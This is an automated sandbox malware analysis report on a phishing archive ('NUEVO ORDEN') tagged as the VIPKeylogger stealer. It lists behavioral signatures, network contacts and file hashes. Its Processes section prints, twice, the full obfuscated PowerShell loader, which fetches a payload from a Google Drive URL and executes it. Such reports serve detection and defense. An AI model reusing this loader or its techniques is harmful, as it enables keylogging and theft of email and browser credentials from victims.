Malware Analysis Report

2024-11-13 15:36

Sample ID 241022-t6m1ssvcnb
Target 22102024_1632_22102024_NUEVOORDEN.rar
SHA256 98e999b9e6771e3f4dd54455ece73c011dea3c7f93ae9a75932b2a0a08765f25
Tags
vipkeylogger discovery execution keylogger stealer collection
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

98e999b9e6771e3f4dd54455ece73c011dea3c7f93ae9a75932b2a0a08765f25

Threat Level: Known bad

The file 22102024_1632_22102024_NUEVOORDEN.rar was found to be: Known bad.

Malicious Activity Summary

vipkeylogger discovery execution keylogger stealer collection

VIPKeylogger

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Command and Scripting Interpreter: PowerShell

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

outlook_win_path

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-22 16:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-22 16:40

Reported

2024-10-22 16:42

Platform

win7-20240708-en

Max time kernel

70s

Max time network

72s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | checkip.dyndns.org | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. 
Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe 
UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK 
Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. 
Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe 
UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK 
Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | drive.google.com | udp
GB | 172.217.16.238:443 | drive.google.com | tcp
US | 8.8.8.8:53 | drive.usercontent.google.com | udp
GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp
GB | 172.217.16.238:443 | drive.google.com | tcp
US | 8.8.8.8:53 | c.pki.goog | udp
GB | 142.250.178.3:80 | c.pki.goog | tcp
US | 8.8.8.8:53 | o.pki.goog | udp
GB | 142.250.178.3:80 | o.pki.goog | tcp
GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp
US | 8.8.8.8:53 | checkip.dyndns.org | udp
US | 193.122.130.0:80 | checkip.dyndns.org | tcp
US | 8.8.8.8:53 | reallyfreegeoip.org | udp
US | 172.67.177.134:443 | reallyfreegeoip.org | tcp
US | 8.8.8.8:53 | crl.microsoft.com | udp
GB | 2.18.190.72:80 | crl.microsoft.com | tcp
US | 8.8.8.8:53 | www.microsoft.com | udp
GB | 184.25.193.234:80 | www.microsoft.com | tcp

Files

memory/2328-4-0x000007FEF66BE000-0x000007FEF66BF000-memory.dmp

memory/2328-5-0x000000001B750000-0x000000001BA32000-memory.dmp

memory/2328-6-0x0000000001F00000-0x0000000001F08000-memory.dmp

memory/2328-7-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

memory/2328-8-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

memory/2328-9-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

memory/2328-11-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

memory/2328-10-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

memory/2328-13-0x000007FEF66BE000-0x000007FEF66BF000-memory.dmp

memory/2328-14-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

memory/2328-16-0x000007FEF6400000-0x000007FEF6D9D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7L21292GINPGT8Z2L69A.temp

MD5 18b7db5ead2014a336bbd513a7935a93
SHA1 0e6af9ad08db6a8cb0d6d23ce9792612a65fdcb4
SHA256 95ed4c306fbe11cdeacb31afdce49cd5554142909a95499402bcb0e3ef5c8c37
SHA512 64c1aa0022a528708ce93f241fca2c0f0bb0e1f0d3945d8365b902c473917bdc8c7a34fb3614d4ff8bbc70cce67659d0b0f554edbc26f8524eb86ede1f5b4c60

C:\Users\Admin\AppData\Roaming\Realiaernes60.Svo

MD5 15d4bf8d1435c92eafc43ebdff22b873
SHA1 18a5e9c68c654584e41ddda35c8c1a7e8ea2e13a
SHA256 ecc8d18d98910379300d492a98f573e56ca9daafd3b1cd52ddffd44c175832ce
SHA512 463ca3c56eacd94dd062c048e630a14d7d89da4b16e589126357f92c32c0d42abdc0d53f59fa62ecebcee7703687b5cf75fe8a9e0dd8629745a5f6134015e41c

memory/2748-20-0x0000000006660000-0x000000000BE28000-memory.dmp

memory/3036-21-0x00000000001E0000-0x0000000001242000-memory.dmp

memory/3036-43-0x00000000001E0000-0x0000000001242000-memory.dmp

memory/3036-44-0x00000000001E0000-0x0000000000228000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-22 16:40

Reported

2024-10-22 16:42

Platform

win10v2004-20241007-en

Max time kernel

146s

Max time network

145s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | checkip.dyndns.org | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
